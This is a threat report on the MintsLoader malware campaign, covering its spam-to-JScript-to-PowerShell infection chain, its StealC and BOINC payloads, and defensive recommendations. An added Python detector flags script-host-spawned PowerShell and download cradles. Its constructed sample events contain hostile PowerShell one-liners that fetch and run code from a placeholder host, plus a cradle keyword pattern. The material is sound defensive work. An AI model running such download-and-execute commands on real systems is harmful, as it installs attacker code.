Threat Report: MintsLoader – StealC & BOINC Delivery

Threat Overview

The eSentire Threat Response Unit has identified a sophisticated malware campaign involving MintsLoader, a PowerShell-based malware loader, targeting organizations in the US and Europe. This report provides insights into the tactics, techniques, procedures (TTPs), and recommendations to mitigate this ongoing threat.

Threat Actor Group:

Unknown at this time.

Report Summary:

The MintsLoader campaign delivers payloads such as StealC (an information stealer) and the BOINC client, using a Domain Generation Algorithm (DGA) and anti-VM techniques to evade detection. The infection process begins with a spam email containing a malicious link that downloads a JScript file, which ultimately executes PowerShell commands to retrieve and launch the subsequent malware stages. StealC targets sensitive data from browsers, applications, and crypto-wallets.

Industries Affected:

Electricity, Oil & Gas, Legal Services.

Confidence Level: High (100)

Reliability of the Report: 

Usually reliable

Threat TTPs:

  • Spam emails with malicious links

  • JScript file downloads

  • PowerShell commands for malware retrieval and execution

  • DGA and anti-VM techniques

  • Information stealing

External References:

https://www.esentire.com/blog/mintsloader-stealc-and-boinc-delivery

https://otx.alienvault.com/pulse/678e2ed0691dbaf790bf355c

Recommendations:

  1. Email Filtering: Implement robust email filtering to block suspicious emails and attachments.

  2. Employee Training: Train employees to recognize phishing attempts and avoid clicking on unknown links or downloading unknown files.

  3. Endpoint Security: Enhance endpoint security solutions and keep them up-to-date to better detect and block malicious files.

  4. PowerShell Script Block Logging: Enable PowerShell script block logging to monitor and detect suspicious commands.

  5. Regular Patch Management: Ensure timely patch management to protect against known vulnerabilities exploited by malware like MintsLoader.
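As an added example (not code from the eSentire report), the Python sketch below shows what recommendation 4 gives a defender: with PowerShell script block logging (Event ID 4104) and process-creation telemetry (Sysmon Event ID 1), the JScript-to-PowerShell hand-off described in the report summary can be flagged. The event records, field names and URLs are constructed for illustration and are not indicators from the campaign.

```python
import re

# Constructed sample records, loosely modelled on Sysmon process-creation
# (ID 1) and PowerShell script block (ID 4104) events. Field names are an
# assumption of this example, not real telemetry from the campaign.
SAMPLE_EVENTS = [
    {"id": 1, "parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -ep bypass -c "iex (iwr http://example.invalid/s)"'},
    {"id": 1, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell Get-ChildItem C:\\Users"},
    {"id": 4104, "script": "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"},
    {"id": 4104, "script": "Get-Process | Where-Object { $_.CPU -gt 100 }"},
]

# Script hosts that a JScript dropper runs under; PowerShell spawned from them
# is unusual on most workstations.
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")

# Common download-and-execute ("cradle") keywords seen in loader one-liners.
CRADLE = re.compile(r"(iex|invoke-expression|downloadstring|iwr|invoke-webrequest|"
                    r"-encodedcommand|-enc\b|frombase64string)", re.IGNORECASE)

def detect(events):
    """Return (rule_name, evidence) tuples for events matching the MintsLoader-style chain."""
    hits = []
    for e in events:
        if e["id"] == 1:
            parent = e["parent"].lower().rsplit("\\", 1)[-1]
            child = e["image"].lower().rsplit("\\", 1)[-1]
            if parent in SCRIPT_HOSTS and child.startswith("powershell"):
                hits.append(("script_host_spawned_powershell", e["cmdline"]))
            elif child.startswith("powershell") and CRADLE.search(e["cmdline"]):
                hits.append(("powershell_download_cradle", e["cmdline"]))
        elif e["id"] == 4104 and CRADLE.search(e["script"]):
            # Script block logging exposes the decoded/expanded script even when
            # the command line itself was obfuscated or encoded.
            hits.append(("scriptblock_download_cradle", e["script"]))
    return hits

if __name__ == "__main__":
    for rule, evidence in detect(SAMPLE_EVENTS):
        print(f"[{rule}] {evidence}")
```

The first rule fires on the parent/child relationship alone, so it still works when the PowerShell command line is obfuscated; the 4104 rule is what makes recommendation 4 worthwhile, since script block logging records the script content that reaches the engine.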

